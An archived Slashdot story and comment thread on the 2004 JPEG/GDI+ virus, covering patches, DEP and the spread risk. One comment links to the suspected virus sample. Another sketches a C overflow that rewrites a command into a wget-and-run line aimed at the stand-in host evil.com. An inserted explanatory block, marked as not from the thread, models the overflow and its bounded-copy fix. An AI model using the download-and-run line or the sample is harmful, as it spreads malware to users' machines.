Slashdot Mirror


First JPEG Virus Posted To Usenet

Shawn writes "This could possibly be the worst virus yet! Earlier this month Microsoft announced a problem in their GDI driver that processes the way JPEG images are displayed. Someone has finally posted an exploit to Usenet. Easynews, a premium Usenet provider, found the virus Sunday afternoon. Up-to-date information about how we found it and what it does is located at www.easynews.com/virus.txt. When this picture is viewed it installs remote management software (winvnc and radmin) and will connect to IRC."

23 of 694 comments

  1. Re:Anyone have a working copy? by JS_RIDDLER · · Score: 5, Informative

    In the article the virus.txt has a jpeg sample in code.

    --
    _JS
  2. Re:Anyone have a working copy? by Anonymous Coward · · Score: 5, Informative

    http://easynews.com/test/possiblevirus.jpg.gz

    Got the link from bugtraq a few hours ago.

  3. Screenshots... by tajmorton · · Score: 5, Funny

    No Screenshots, please!

    --
    Tell the truth and you won't have so much to remember.
  4. Re:Anyone have a working copy? by Anonymous+Freak · · Score: 5, Informative

    Well, Apple's Preview (as of 10.3.5 with all the latest updates as of 6:00 PM PDT, 9/27/04) says it's not a supported file type.

    Graphic Converter complains that "Some parts of the file may be missing."

    Safari displays a blank page, with no errors.

    In all cases, I can't find any file-system goofiness. (And the free-with-DotMac Virex doesn't detect it as a virus.)

    (The offending "virus" is available as a linked-to zip file in the linked virus.txt page.)

    --
    Another non-functioning site was "uncertainty.microsoft.com."
    The purpose of that site was not known.
  5. alt.binaries.erotica.beanie-babies by drachenfyre · · Score: 5, Funny

    Ok, no offense, but beanie-babies and erotica? There are some newsgroups that just shouldn't exist.

  6. Re:Can be prevented... by Zocalo · · Score: 5, Informative

    Yes it has. Unfortunately, like many Microsoft patches, it gives you a nice fuzzy sense of false security. According to Microsoft, I'm nice and safe, but according to Tom Liston's GDIScanner and a quick perusal of the file versions, I'm quite possibly not. Fortunately my virus scanner *does* seem to pick up on this, but that's no thanks to Microsoft.

    --
    UNIX? They're not even circumcised! Savages!
  7. The answer is... by Leomania · · Score: 5, Informative

    yes, if you haven't updated to the latest version.

    See this Slashdot thread.

    - Leo

    --
    You don't use science to show that you're right, you use science to become right.
  8. Re:That's pretty amazing. by mini+me · · Score: 5, Informative

    Hopefully Mozilla decodes the JPGs itself before rendering them on Windows.

    It does. But Mozilla had almost the exact same problem with both BMP and PNG in the last week or two. So it's not just Microsoft who has vulnerable image decoders.

  9. The joys of keeping a campus virus-free by iamlucky13 · · Score: 5, Interesting

    Our university campus has a huge problem with viruses and this is another exciting addition to our collection. I'm sure I'll start seeing plenty of guys asking for help getting this removed, after finding out pornstars aren't virus free after all.

    Thankfully, though, this shouldn't cause as much trouble as our current crop of worms. I'm shocked at how dumb our users are, as a whole. We're still having people infected with Blaster, over a year after Microsoft patched that vulnerability! Sasser is absolutely rampant. The school even purchased a blanket license of Norton, but I would bet less than half of the students have installed it. We have a T3 line providing our outside connection, and it's currently averaging about 7 Mbps combined up/down, because the internal network, which is mostly linked from building to building by gigabit fiber, is saturated by virus crap. Although this virus may have a really effective way of spreading, it scares me very little.

  10. Re:That's pretty amazing. by datawar · · Score: 5, Informative

    Are you serious? Of course Slashdot covered those stories too.

    Critical Mozilla, Thunderbird Vulnerabilities

    CERT Warns Of Multiple Vulnerabilities In Libpng

  11. Re:Just begging to be sued by toetagger1 · · Score: 5, Informative

    Google finds a whole lot of exploits for this guy, ranging from Apache to AIM away message buffer overruns.

    --
    who | grep -i blond | date cd ~; unzip; touch; strip; finger; mount; gasp; yes; uptime; umount; sleep
  12. Microsoft Patch by bcreane · · Score: 5, Informative

    FYI, here's the fix from M$ for this exploit: Security Bulletin

  13. God dammit! by Anonymous Coward · · Score: 5, Funny

    Why doesn't Slashdot allow you to post images! :)

  14. Re:Can be prevented... by Saratoga+C++ · · Score: 5, Informative

    Sorry to burst your bubble dude, but that patch only fixed the system's instance of GDI+. There are a ton of apps that have their own version of GDI+ built on their own app path. Just because you use the patch, that doesn't mean that it's actually fixed.

    Say you're using app X that uses GDI+ to render its own image stuff (say it's a picture album maker). It keeps its own version of GDI+ that the developers extended for their own reasons. This GDI+ is vulnerable. After patching, this older version of GDI+ is still on your system, so that app is vulnerable...

    So buyer beware.

  15. NX Protection? by rsmith-mac · · Score: 5, Interesting

    Just out of curiosity, does anyone know if x86 no-execute protection (the NX bit, aka the XD bit, aka Data Execution Protection) prevents against this? With the release of SP2 and DEP support, it would seem that this would be a good test to see if DEP is all it's cracked up to be.

    1. Re:NX Protection? by Anonymous Coward · · Score: 5, Informative
      I can't speak for this virus specifically, but DEP isn't the end-all-be-all of buffer overflow prevention. For example:
      #include <stdio.h>
      #include <stdlib.h>
      #include <string.h>

      char overflowed[10];
      char command[] = "echo \"some silly command\"";   /* intended to sit right after 'overflowed' in the data segment */

      int main(int argc, char **argv){
          if (argc < 2) return 1;
          strcpy(overflowed, argv[1]);   /* unbounded copy: runs past 'overflowed' into 'command' */
          system(command);               /* executes whatever 'command' now holds */
          return 0;
      }
      We can overflow overflowed to change command into something like "sh \"wget http:\\evil.com\virus > virus.sh;virus.sh\"" or somesuch. Bonus points if you diddle with the C library's jump table so that any system call ends up being exec(..). The key here is that no data segments are executed, so NX protection wouldn't help.
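The data-only overflow the comment sketches, worked through as an added example (this is not code from the thread or from any commenter): a toy frame puts a 10-byte input buffer directly in front of a command string, reproduces what an unbounded copy does to the neighbouring field, and sets the bounded copy that stops it alongside. The struct layout, the memcpy model of the unbounded copy and the constructed input are assumptions of this example; nothing is executed, the functions only report what the command string would have become.

```c
#include <stdio.h>
#include <string.h>

/* Added example: a fixed-size input buffer sits directly in front of a
 * command string. The struct makes that adjacency explicit instead of
 * relying on how the linker happens to lay out globals. */
struct frame {
    char overflowed[10];
    char command[40];
};

#define DEFAULT_COMMAND "echo \"some silly command\""

static void frame_init(struct frame *f)
{
    memset(f, 0, sizeof *f);
    memcpy(f->command, DEFAULT_COMMAND, sizeof DEFAULT_COMMAND);
}

/* The unbounded copy. memcpy over the struct viewed as bytes reproduces what
 * strcpy(overflowed, input) does to the neighbouring field, without the
 * undefined behaviour of a real out-of-bounds write. No instruction is ever
 * fetched from this data, so NX/DEP has nothing to object to; the legitimate
 * system(command) call downstream would simply run different text. */
const char *vulnerable_copy(struct frame *f, const char *input)
{
    size_t n = strlen(input) + 1;
    if (n > sizeof *f)
        n = sizeof *f;                 /* keep the model itself in bounds */
    memcpy((char *)f, input, n);       /* bytes 10 onwards land in f->command */
    f->command[sizeof f->command - 1] = '\0';
    return f->command;
}

/* The hardened copy: the length is checked against the destination before
 * anything is written, so 'command' cannot be reached. Returns 0 on success,
 * -1 when the input is rejected and the frame is left untouched. */
int safe_copy(struct frame *f, const char *input)
{
    size_t n = strlen(input);
    if (n >= sizeof f->overflowed)
        return -1;
    memcpy(f->overflowed, input, n + 1);
    return 0;
}

/* Constructed input: 10 filler bytes to fill 'overflowed', then the text that
 * spills into 'command'. The replacement is a harmless echo. */
#define LONG_INPUT "AAAAAAAAAAecho overwritten"

/* Returns 1 if the unbounded copy replaced the command string. */
int demo_vulnerable(void)
{
    struct frame f;
    frame_init(&f);
    return strcmp(vulnerable_copy(&f, LONG_INPUT), "echo overwritten") == 0;
}

/* Returns 1 if the bounded copy rejected the same input and left the
 * command string intact. */
int demo_safe(void)
{
    struct frame f;
    frame_init(&f);
    int rc = safe_copy(&f, LONG_INPUT);
    return rc == -1 && strcmp(f.command, DEFAULT_COMMAND) == 0;
}

/* Returns 1 if the bounded copy still accepts input that fits. */
int demo_safe_short(void)
{
    struct frame f;
    frame_init(&f);
    int rc = safe_copy(&f, "short");
    return rc == 0 && strcmp(f.overflowed, "short") == 0
        && strcmp(f.command, DEFAULT_COMMAND) == 0;
}

int main(void)
{
    printf("unbounded copy hijacked command: %s\n", demo_vulnerable() ? "yes" : "no");
    printf("bounded copy rejected input:     %s\n", demo_safe() ? "yes" : "no");
    printf("bounded copy accepts short input: %s\n", demo_safe_short() ? "yes" : "no");
    return 0;
}
```

The point the model makes is the one the comment raises: NX/DEP only governs where instructions may be fetched from, so an overflow that never executes data and only rewrites data the program later trusts is untouched by it. The mitigation is a length check before the copy (or a compiler-inserted one, as with FORTIFY_SOURCE or stack protectors), not the memory permission bit.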
  16. Re:Anyone have a working copy? by Three+Headed+Man · · Score: 5, Funny

    I extracted the bad code, but I'm having trouble getting it to run in WINE.

    Just one more reason Linux isn't ready for the desktop.

    --
    I'm probably at the karma cap. Mod up a funny troll instead, it lightens the mood :)
  17. Re:I don't see why this is a problem by Waffle+Iron · · Score: 5, Informative
    If you aren't running as an administrator, which you shouldn't be, it can't install itself. It's the same as Linux or any other OS with a basic user system.

    It can still do anything the user can do, including installing itself in the user's account space, setting itself to run every time the user logs on, uploading all of the files the user can access, logging the user's keystrokes, sending email, pinging for other systems, etc. Running as a non-administrator is not a panacea.

  18. Hacked CNN Advertisements by 8400_RPM · · Score: 5, Insightful

    So what happens when someone hacks the ad server that cnn or google uses, and puts this jpeg up?

    Millions of instant zombies.

    That's f*cking scary....

  19. Re:Not particularly well coded by djeca · · Score: 5, Insightful

    Just had a nasty thought... the latest round of IM programs have user-settable "buddy icons" which IIRC can be JPEGs. A worm that used buddy icons to spread could have half the internet infected in 15 minutes, and do it via existing social networks. I hope the MSN and AIM servers are scanning buddy icons to prevent this being used...

  20. Re:That's pretty amazing. by Doyle · · Score: 5, Funny

    I have to ask, what has MS done that is actually useful since Windows 2000?

    You mean, apart from the sanitation, the medicine, education, wine, public order, irrigation, roads, a fresh water system, and public health?

    Oh, wait - that was the Romans :P

  21. Re:Can be prevented... by Anonymous Coward · · Score: 5, Informative

    While we're bursting bubbles, the patch from Microsoft contains a tool that scans your hard disk for all vulnerable GDI DLLs.

    Another bubble bites the dust! It detects, but does not fix the problem. Nor does it even tell you where the problem is. This was covered earlier today.

  22. Re:That's pretty amazing. by IchBinEinPenguin · · Score: 5, Informative

    Returning with the same stuff they have now, but with little or no security issues

    Sorry, that won't work.

    Some of the stuff is insecure by design! Not "designed to be insecure", just "impossible to secure given the design".

    Take ActiveX: running binary code downloaded from anywhere without a JVM-like sandbox is insecure. No matter how many digital signatures, OK dialog boxes and warning messages you add, some (most?) users WILL simply click through all the warnings and have their boxes 0wn3d.

    Design has tradeoffs between security, performance, usability etc. etc. Some of this stuff you can't fix without changing the basic design (i.e. starting from scratch).